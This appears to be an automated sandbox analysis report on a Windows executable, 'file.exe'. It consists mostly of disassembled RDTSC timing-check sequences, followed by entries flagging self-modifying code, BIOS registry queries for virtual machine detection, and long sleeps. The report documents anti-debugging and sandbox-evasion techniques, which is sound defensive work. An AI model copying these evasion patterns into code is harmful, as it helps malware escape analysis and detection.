            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536047F second address: 53604D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007FF9ACE940A9h 0x0000000f lea eax, dword ptr [ebp-10h] 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FF9ACE9409Ch 0x00000019 sub ch, 00000038h 0x0000001c jmp 00007FF9ACE9409Bh 0x00000021 popfd 0x00000022 mov ax, 6C6Fh 0x00000026 popad 0x00000027 mov dword ptr fs:[00000000h], eax 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov cx, bx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53604D5 second address: 53604DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53604DA second address: 53604E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53604E0 second address: 53604E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53604E4 second address: 53604E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53604E8 second address: 5360510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp-18h], esp 0x0000000b pushad 0x0000000c mov dl, cl 0x0000000e mov ebx, 56FA09BAh 0x00000013 popad 0x00000014 mov eax, dword ptr fs:[00000018h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF9ACEA228Ch 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360510 second address: 536053C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE9409Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [eax+00000FDCh] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF9ACE940A5h 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536053C second address: 53605EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 pushfd 0x00000006 jmp 00007FF9ACEA2293h 0x0000000b and eax, 64AEBC1Eh 0x00000011 jmp 00007FF9ACEA2299h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test ecx, ecx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FF9ACEA228Ch 0x00000023 and al, 00000018h 0x00000026 jmp 00007FF9ACEA228Bh 0x0000002b popfd 0x0000002c mov dh, cl 0x0000002e popad 0x0000002f jns 00007FF9ACEA22A4h 0x00000035 pushad 0x00000036 mov al, bh 0x00000038 movzx esi, bx 0x0000003b popad 0x0000003c add eax, ecx 0x0000003e jmp 00007FF9ACEA2295h 0x00000043 mov ecx, dword ptr [ebp+08h] 0x00000046 jmp 00007FF9ACEA228Eh 0x0000004b test ecx, ecx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FF9ACEA2297h 0x00000054 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53605EA second address: 5360602 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF9ACE940A4h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535024B second address: 5350250 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350250 second address: 535028E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FF9ACE940A9h 0x00000011 adc ax, 7FC6h 0x00000016 jmp 00007FF9ACE940A1h 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535028E second address: 5350293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350293 second address: 53502B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE940A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ecx, edi 0x00000011 popad 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53502B7 second address: 5350305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 pushfd 0x00000007 jmp 00007FF9ACEA2292h 0x0000000c xor esi, 7FE1C5F8h 0x00000012 jmp 00007FF9ACEA228Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, edi 0x0000001c pushad 0x0000001d push edi 0x0000001e mov si, 497Dh 0x00000022 pop esi 0x00000023 popad 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FF9ACEA2292h 0x0000002e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350305 second address: 5350314 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE9409Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350362 second address: 5350368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350368 second address: 535036C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535036C second address: 535038C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub ebx, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF9ACEA2294h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535038C second address: 53503A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE9409Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53503A3 second address: 53503A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53503A7 second address: 53503AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53503AD second address: 53503FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA2293h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc ebx 0x0000000a jmp 00007FF9ACEA2296h 0x0000000f test al, al 0x00000011 pushad 0x00000012 mov al, 71h 0x00000014 mov dh, 36h 0x00000016 popad 0x00000017 je 00007FF9ACEA2441h 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF9ACEA2291h 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53503FC second address: 5350418 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE940A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea ecx, dword ptr [ebp-14h] 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350418 second address: 5350461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, cx 0x00000007 popad 0x00000008 pushfd 0x00000009 jmp 00007FF9ACEA2294h 0x0000000e xor cx, 2288h 0x00000013 jmp 00007FF9ACEA228Bh 0x00000018 popfd 0x00000019 popad 0x0000001a mov dword ptr [ebp-14h], edi 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF9ACEA2295h 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53504EB second address: 53504EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53504EF second address: 53504F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53504F5 second address: 53504FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53504FB second address: 535058C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA2298h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d jmp 00007FF9ACEA2290h 0x00000012 jg 00007FFA1D5B01E7h 0x00000018 jmp 00007FF9ACEA2290h 0x0000001d js 00007FF9ACEA22E3h 0x00000023 pushad 0x00000024 movzx esi, bx 0x00000027 movsx ebx, cx 0x0000002a popad 0x0000002b cmp dword ptr [ebp-14h], edi 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FF9ACEA2290h 0x00000035 adc ah, 00000058h 0x00000038 jmp 00007FF9ACEA228Bh 0x0000003d popfd 0x0000003e mov ebx, eax 0x00000040 popad 0x00000041 jne 00007FFA1D5B01ABh 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FF9ACEA228Ch 0x00000050 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535058C second address: 5350592 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350592 second address: 53505C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA228Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF9ACEA2297h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53505C0 second address: 53505E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE940A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-2Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53505E6 second address: 53505EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53505EC second address: 5350662 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE940A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FF9ACE940A0h 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007FF9ACE940A1h 0x00000016 jmp 00007FF9ACE940A0h 0x0000001b popad 0x0000001c xchg eax, esi 0x0000001d jmp 00007FF9ACE940A0h 0x00000022 nop 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FF9ACE940A7h 0x0000002a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350757 second address: 535075D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535075D second address: 535079C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE940A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FF9ACE9409Eh 0x00000016 xor si, 66C8h 0x0000001b jmp 00007FF9ACE9409Bh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535079C second address: 535002C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF9ACEA228Fh 0x00000008 jmp 00007FF9ACEA2298h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 je 00007FFA1D5B0112h 0x00000016 xor eax, eax 0x00000018 jmp 00007FF9ACE7B9BAh 0x0000001d pop esi 0x0000001e pop edi 0x0000001f pop ebx 0x00000020 leave 0x00000021 retn 0004h 0x00000024 nop 0x00000025 sub esp, 04h 0x00000028 mov esi, eax 0x0000002a cmp esi, 00000000h 0x0000002d setne al 0x00000030 xor ebx, ebx 0x00000032 test al, 01h 0x00000034 jne 00007FF9ACEA2287h 0x00000036 jmp 00007FF9ACEA238Fh 0x0000003b call 00007FF9B160DCA5h 0x00000040 mov edi, edi 0x00000042 jmp 00007FF9ACEA2293h 0x00000047 xchg eax, ebp 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b call 00007FF9ACEA2292h 0x00000050 pop esi 0x00000051 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535002C second address: 535008F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF9ACE9409Bh 0x00000008 and si, 784Eh 0x0000000d jmp 00007FF9ACE940A9h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007FF9ACE940A0h 0x0000001b xor ecx, 586374C8h 0x00000021 jmp 00007FF9ACE9409Bh 0x00000026 popfd 0x00000027 popad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FF9ACE9409Bh 0x00000032 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535008F second address: 5350093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350093 second address: 5350099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350099 second address: 53500EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA2294h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF9ACEA2290h 0x0000000f mov ebp, esp 0x00000011 jmp 00007FF9ACEA2290h 0x00000016 xchg eax, ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FF9ACEA2297h 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350D0B second address: 5350D6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE940A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FFA1D591D76h 0x0000000f pushad 0x00000010 push esi 0x00000011 push edi 0x00000012 pop eax 0x00000013 pop ebx 0x00000014 pushfd 0x00000015 jmp 00007FF9ACE940A6h 0x0000001a sbb eax, 173BCC38h 0x00000020 jmp 00007FF9ACE9409Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FF9ACE940A5h 0x0000002f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350D6C second address: 5350D72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350D72 second address: 5350D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350DDD second address: 5350E72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF9ACEA228Fh 0x00000009 adc cx, 3A1Eh 0x0000000e jmp 00007FF9ACEA2299h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FF9ACEA2290h 0x0000001a sub si, 9018h 0x0000001f jmp 00007FF9ACEA228Bh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 push 1551FA81h 0x0000002d pushad 0x0000002e mov dl, 2Fh 0x00000030 call 00007FF9ACEA228Eh 0x00000035 jmp 00007FF9ACEA2292h 0x0000003a pop ecx 0x0000003b popad 0x0000003c xor dword ptr [esp], 60FB66A9h 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 mov ecx, 3B5FCAF9h 0x0000004b mov ax, 1DB5h 0x0000004f popad 0x00000050 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350E72 second address: 5350E78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350E78 second address: 5350E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350E7C second address: 5350EA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007FFA1D598D84h 0x0000000d push 75A52B70h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov eax, dword ptr [esp+10h] 0x0000001d mov dword ptr [esp+10h], ebp 0x00000021 lea ebp, dword ptr [esp+10h] 0x00000025 sub esp, eax 0x00000027 push ebx 0x00000028 push esi 0x00000029 push edi 0x0000002a mov eax, dword ptr [75AB4538h] 0x0000002f xor dword ptr [ebp-04h], eax 0x00000032 xor eax, ebp 0x00000034 push eax 0x00000035 mov dword ptr [ebp-18h], esp 0x00000038 push dword ptr [ebp-08h] 0x0000003b mov eax, dword ptr [ebp-04h] 0x0000003e mov dword ptr [ebp-04h], FFFFFFFEh 0x00000045 mov dword ptr [ebp-08h], eax 0x00000048 lea eax, dword ptr [ebp-10h] 0x0000004b mov dword ptr fs:[00000000h], eax 0x00000051 ret 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 movzx esi, bx 0x00000058 jmp 00007FF9ACE940A7h 0x0000005d popad 0x0000005e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350EA7 second address: 5350EAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350F6B second address: 5350FD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FF9ACE940A1h 0x0000000c and eax, 1B8DCCB6h 0x00000012 jmp 00007FF9ACE940A1h 0x00000017 popfd 0x00000018 popad 0x00000019 je 00007FFA1D587A7Fh 0x0000001f jmp 00007FF9ACE9409Eh 0x00000024 cmp dword ptr [ebp+08h], 00002000h 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FF9ACE940A7h 0x00000032 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350FD0 second address: 5350FE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF9ACEA2294h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350FE8 second address: 5350FEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53609FF second address: 5360A10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA228Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360A10 second address: 5360A16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360A16 second address: 5360A3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA2293h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop ecx 0x00000011 mov bx, 6032h 0x00000015 popad 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360A3A second address: 5360A6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 pushfd 0x00000006 jmp 00007FF9ACE940A2h 0x0000000b add ch, 00000048h 0x0000000e jmp 00007FF9ACE9409Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push eax 0x0000001c pop edi 0x0000001d mov edi, ecx 0x0000001f popad 0x00000020 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360A6D second address: 5360A73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360A73 second address: 5360A77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360A77 second address: 5360A9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a jmp 00007FF9ACEA2297h 0x0000000f push eax 0x00000010 push edx 0x00000011 mov dx, cx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360A9D second address: 5360AFE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 jmp 00007FF9ACE9409Ch 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FF9ACE9409Dh 0x00000018 and si, 3526h 0x0000001d jmp 00007FF9ACE940A1h 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007FF9ACE940A0h 0x00000029 sub ax, 96C8h 0x0000002e jmp 00007FF9ACE9409Bh 0x00000033 popfd 0x00000034 popad 0x00000035 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360AFE second address: 5360B24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 movsx ebx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF9ACEA2298h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360B24 second address: 5360B71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF9ACE940A1h 0x00000009 or cx, E146h 0x0000000e jmp 00007FF9ACE940A1h 0x00000013 popfd 0x00000014 mov ebx, ecx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF9ACE940A9h 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360B71 second address: 5360B76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360B76 second address: 5360B7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360B7C second address: 5360BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov esi, dword ptr [ebp+0Ch] 0x0000000a jmp 00007FF9ACEA2299h 0x0000000f test esi, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FF9ACEA2293h 0x0000001a adc cx, 933Eh 0x0000001f jmp 00007FF9ACEA2299h 0x00000024 popfd 0x00000025 jmp 00007FF9ACEA2290h 0x0000002a popad 0x0000002b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360BE8 second address: 5360BEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360BEE second address: 5360BF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360CDA second address: 5360CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 mov dx, ax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360CE4 second address: 5360CFC instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 1EFB2D45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, esi 0x0000000b pushad 0x0000000c call 00007FF9ACEA228Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Tries to evade debugger and weak emulator (self modifying code)
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DBA9AB instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DBA5C3 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C0CA79 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E47FDF instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
            Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\file.exe TID: 7632Thread sleep time: -120000s >= -30000sJump to behavior
